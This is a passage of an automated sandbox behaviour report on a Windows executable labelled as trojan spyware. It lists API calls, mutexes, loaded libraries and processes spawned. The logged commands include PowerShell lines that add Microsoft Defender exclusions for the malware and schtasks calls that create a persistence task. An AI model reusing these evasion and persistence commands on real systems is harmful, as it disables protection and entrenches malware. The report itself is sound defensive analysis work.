              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, dr4ObpyBXWrmi7HiU1.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, dr4ObpyBXWrmi7HiU1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, dr4ObpyBXWrmi7HiU1.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, BCDpIFlNesVBIhQHgH.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, BCDpIFlNesVBIhQHgH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@43/32@13/1
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile created: C:\Users\user\AppData\Roaming\RTUZKYTc.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2608:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5476:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1876:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2412:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMutant created: \Sessions\1\BaseNamedObjects\TdUxMCK2FUdy51AH
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile created: C:\Users\user\AppData\Local\Temp\tmp960E.tmpJump to behavior
              Source: SS Bottmac Engineers Pvt. Ltd..exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: SS Bottmac Engineers Pvt. Ltd..exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: SS Bottmac Engineers Pvt. Ltd..exeReversingLabs: Detection: 39%
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile read: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\RTUZKYTc.exe C:\Users\user\AppData\Roaming\RTUZKYTc.exe
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe'
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpAD5E.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess created: C:\Users\user\AppData\Roaming\RTUZKYTc.exe "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SS Bottmac Engineers Pvt. Ltd..exe'
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe'
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpE6A.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp2E66.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"Jump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"Jump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"Jump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe'Jump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SS Bottmac Engineers Pvt. Ltd..exe'Jump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe'Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpAD5E.tmp"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess created: C:\Users\user\AppData\Roaming\RTUZKYTc.exe "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpE6A.tmp"
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp2E66.tmp"
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeProcess created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: urlmon.dllJump to behavior
